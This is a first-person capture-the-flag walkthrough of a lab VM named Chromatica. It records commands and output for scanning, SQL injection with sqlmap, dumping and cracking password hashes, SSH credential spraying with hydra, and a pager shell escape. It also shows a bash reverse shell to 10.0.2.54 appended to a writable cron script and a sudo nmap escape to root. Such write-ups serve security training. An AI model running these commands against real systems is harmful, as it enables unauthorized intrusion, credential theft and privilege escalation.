			ENUMERATION
			

---nmap---

                                                                     
┌──(root㉿kali)-[/home/okina]
└─# nmap 10.0.2.60 -sS -sC -sV -A -T4 -p-  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-14 21:03 +03
Nmap scan report for 10.0.2.60
Host is up (0.00083s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 7c:94:7f:cb:4a:d5:8b:9f:9e:ff:7b:7a:59:ff:75:b5 (ECDSA)
|_  256 ed:94:2a:fc:30:30:cc:07:ae:27:7d:ca:92:01:49:31 (ED25519)
80/tcp   open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Chromatica|Coming Soon..... 
|_http-server-header: Apache/2.4.52 (Ubuntu)
5353/tcp open  domain  dnsmasq 2.86
| dns-nsid: 
|_  bind.version: dnsmasq-2.86
MAC Address: 08:00:27:F1:EC:8E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.83 ms 10.0.2.60

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.12 seconds
       


---open ssh, http and domain dnsmasq ports---



                                                                                
┌──(root㉿kali)-[/home/okina]
└─# gobuster dir -u http://10.0.2.60 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,txt,php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.2.60
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 274]
/index.html           (Status: 200) [Size: 4047]
/.php                 (Status: 403) [Size: 274]
/assets               (Status: 301) [Size: 307] [--> http://10.0.2.60/assets/]
/css                  (Status: 301) [Size: 304] [--> http://10.0.2.60/css/]
/js                   (Status: 301) [Size: 303] [--> http://10.0.2.60/js/]
/javascript           (Status: 301) [Size: 311] [--> http://10.0.2.60/javascript/]
/robots.txt           (Status: 200) [Size: 36]
/.html                (Status: 403) [Size: 274]
/.php                 (Status: 403) [Size: 274]
/server-status        (Status: 403) [Size: 274]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
                


---found a robots.txt, check it---


user-agent: dev
Allow: /dev-portal/


---It gives us a user agent value and allows a certain path, we can try to curl this using---


┌──(root㉿kali)-[/home/okina]
└─# curl http://10.0.2.60/dev-portal/ -H 'User-Agent: dev'
<!DOCTYPE html>
<html>
<head>
	<title>Chromatica</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="stylesheet" href="css/style.css">
</head>
<body>
	<div class="background-image"></div>
	<div class="container">
		<h1> Search</h1>
		<form action="search.php" method="get">
			<label for="query">Chromatica</label>
			<input type="text" id="query" name="city" placeholder="Type a city's name...">
			<button type="submit">Go</button>
		</form>
	</div>
</body>
</html>
             


---here we get a search.php file and see a get command, whenever there is database mentioned we should check for an 
SQL injection--- 



┌──(root㉿kali)-[/home/okina]
└─# sqlmap -u 'http://10.0.2.60/dev-portal/search.php?city=p*' -H 'User-Agent: dev' --text-only --exclude-sysdbs --dbs --tables

// optional parameters you can use are --batch --level=5 --risk=3 --threads=10 --time-sec=2 --text-only


        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

.
.
.
.
.
[22:11:11] [INFO] fetching tables for databases: 'Chromatica, information_schema'
[22:11:11] [INFO] skipping system databases 'information_schema, mysql, performance_schema, sys'
Database: Chromatica
[2 tables]
+--------+
| cities |
| users  |
+--------+

[22:11:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.0.2.60'

[*] ending @ 22:11:11 /2024-05-14/



---got the database Chromatica and the tables cities and users, I want to get info from the users table, 
it is more likely to have user credentials--- 


┌──(root㉿kali)-[/home/okina]
└─# sqlmap -u 'http://10.0.2.60/dev-portal/search.php?city=p*' -H 'User-Agent: dev' --text-only --exclude-sysdbs -D Chromatica -T users --dump

// once again the optional parameters you can use are --batch --level=5 --risk=3 --threads=10 --time-sec=2 --text-only


        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:04:59 /2024-05-14/
.
.
.
.
.
.

do you want to use common password suffixes? (slow!) [y/N] N
[22:04:59] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[22:04:59] [INFO] starting 2 processes 
[22:05:05] [INFO] cracked password 'keeptrying' for user 'user'                                               
Database: Chromatica                                                                                          
Table: users
[5 entries]
+----+-----------------------------------------------+-----------+-----------------------------+
| id | password                                      | username  | description                 |
+----+-----------------------------------------------+-----------+-----------------------------+
| 1  | 8d06f5ae0a469178b28bbd34d1da6ef3              | admin     | admin                       |
| 2  | 1ea6762d9b86b5676052d1ebd5f649d7              | dev       | developer account for taz   |
| 3  | 3dd0f70a06e2900693fc4b684484ac85 (keeptrying) | user      | user account for testing    |
| 4  | f220c85e3ff19d043def2578888fb4e5              | dev-selim | developer account for selim |
| 5  | aaf7fb4d4bffb8c8002978a9c9c6ddc9              | intern    | intern                      |
+----+-----------------------------------------------+-----------+-----------------------------+



---here we get some user hashes, and got the password for the user "user" already. let's try to crack the
rest---



---I identified, they are all md5 hashes and cracked them using crackstation.com except dev-selim's pass---

                                                                                                               
┌──(root㉿kali)-[/home/okina]
└─# cat credentials.txt 
admin:adm!n
dev:flaghere
user:keeptrying
dev-selim:
intern:intern00
              

┌──(root㉿kali)-[/home/okina]
└─# hydra -C credentials.txt 10.0.2.60 ssh                                          
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-14 22:45:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 5 tasks per 1 server, overall 5 tasks, 5 login tries, ~1 try per task
[DATA] attacking ssh://10.0.2.60:22/
[22][ssh] host: 10.0.2.60   login: dev   password: flaghere


---we have one match for the ssh server, let's check it---



┌──(root㉿kali)-[/home/okina]
└─# ssh dev@10.0.2.60   
dev@10.0.2.60's password: 
GREETINGS,
THIS ACCOUNT IS NOT A LOGIN ACCOUNT
IF YOU WANNA DO SOME MAINTENANCE ON THIS ACCOUNT YOU HAVE TO
EITHER CONTACT YOUR ADMIN
OR THINK OUTSIDE THE BOX
BE LAZY AND CONTACT YOUR ADMIN
OR MAYBE YOU SHOULD USE YOUR HEAD MORE heh,,
REGARDS

brightctf{ALM0ST_TH3R3_34897ffdf69}
Connection to 10.0.2.60 closed.



---shit we got cooked, okay let's think about what we can do---




---keep on fuzzing and searching to find a new lead---




---I try for new methods but nothing works. The error message we get can kind of guide us though---



---Think outside the box and use your head "more". There is a more shell that we can use, you can check it on gtfobins---




---First we get our terminal windows so small that all of the error message can't be seen. Then we type in---


!/bin/sh



---and just like that we are in, joseph you cheeky man :)---





			GAINING FOOTHOLD
			


dev@Chromatica:~$ ls
bye.sh  hello.txt  snap  user.txt
dev@Chromatica:~$ cat user.txt 
---First User Flag---




---here we are in as the dev user and got our first flag let's keep on looking---


dev@Chromatica:~$ cd /home
dev@Chromatica:/home$ ls
analyst  dev
			
			
---there is another user called analyst, let's keep that in mind---



---I dont see any cronjobs and there are no SUID bits, we can keep on going with manual enumeration but I decide 
to use pspy64 to monitor processes---


┌──(root㉿kali)-[/home/okina]
└─# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...



dev@Chromatica:/home$ cd /tmp

dev@Chromatica:/tmp$ wget http://10.0.2.54:8000/pspy64

dev@Chromatica:/tmp$ chmod +x pspy64 


dev@Chromatica:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/05/15 22:39:40 CMD: UID=1001  PID=13375  | ./pspy64 
2024/05/15 22:39:40 CMD: UID=1001  PID=13367  | /bin/bash 
2024/05/15 22:39:40 CMD: UID=1001  PID=13366  | /usr/bin/more /home/dev/hello.txt 
2024/05/15 22:39:40 CMD: UID=1001  PID=13364  | bash -c /home/dev/bye.sh 
2024/05/15 22:39:40 CMD: UID=1001  PID=13363  | sshd: dev@pts/5      
.
.
.
.
.
.
2024/05/15 22:39:40 CMD: UID=0     PID=3      | 
2024/05/15 22:39:40 CMD: UID=0     PID=2      | 
2024/05/15 22:39:40 CMD: UID=0     PID=1      | /sbin/init 
2024/05/15 22:40:01 CMD: UID=0     PID=13384  | /usr/sbin/CRON -f -P 
2024/05/15 22:40:01 CMD: UID=0     PID=13385  | /usr/sbin/CRON -f -P 
2024/05/15 22:40:01 CMD: UID=1002  PID=13386  | /bin/sh -c /bin/bash /opt/scripts/end_of_day.sh 



---here in the processes we see a script in /opt/scripts folder that is being run, lets check it---



dev@Chromatica:/$ cd /opt/scripts/

dev@Chromatica:/opt/scripts$ cat end_of_day.sh 
#this is my end of day script


dev@Chromatica:/opt/scripts$ ls -la
total 12
drwxrwxrwx 2 root    root    4096 May 15 22:42 .
drwxr-xr-x 6 root    root    4096 Apr 24 14:05 ..
-rwxrwxrw- 1 analyst analyst   30 May 15 23:00 end_of_day.sh



---okay, we see that this script belongs to analyst so it means that if we put a reverse shell here we can get analyst
user's shell---


dev@Chromatica:/opt/scripts$ echo '/bin/bash -i >& /dev/tcp/10.0.2.54/1234 0>&1' >> end_of_day.sh 

dev@Chromatica:/opt/scripts$ cat end_of_day.sh 
#this is my end of day script
/bin/bash -i >& /dev/tcp/10.0.2.54/1234 0>&1



---set up our listener and wait, since this script runs automatically we will get the access after some time---


Note: When I run the script using bash command I couldn't get access as analyst, so wait and let script run automatically,
don't be impatient



┌──(root㉿kali)-[/home/okina]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.0.2.54] from (UNKNOWN) [10.0.2.60] 60360
bash: cannot set terminal process group (4735): Inappropriate ioctl for device
bash: no job control in this shell
analyst@Chromatica:~$ ls
ls
analyst.txt
hello.txt
snap
analyst@Chromatica:~$ cat analyst.txt
cat analyst.txt
brightctf{GAZETTO_RUKI_b2f4f50f398}


---here we get access as the user analyst, let's check to see if this user has more permissions---



			
			PRIVILEGE ESCALATION


analyst@Chromatica:~$ sudo -l
sudo -l
Matching Defaults entries for analyst on Chromatica:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User analyst may run the following commands on Chromatica:
    (ALL : ALL) NOPASSWD: /usr/bin/nmap



---nice, by visiting the gtfobins I find a priv escalate vector for nmap---


TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF



---let's use those bad boys--- 

analyst@Chromatica:~$ TF=$(mktemp) 
TF=$(mktemp)

analyst@Chromatica:~$ echo 'os.execute("/bin/sh")' > $TF
echo 'os.execute("/bin/sh")' > $TF

analyst@Chromatica:~$ sudo /usr/bin/nmap --script=$TF

sudo /usr/bin/nmap --script=$TF
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-15 23:17 UTC
NSE: Warning: Loading '/tmp/tmp.pzY79oAYTg' -- the recommended file extension is '.nse'.

whoami
root


---Boom, we are root, go get that flag now---


cd /root
ls
root.txt
snap

cat root.txt
---Root User Flag---



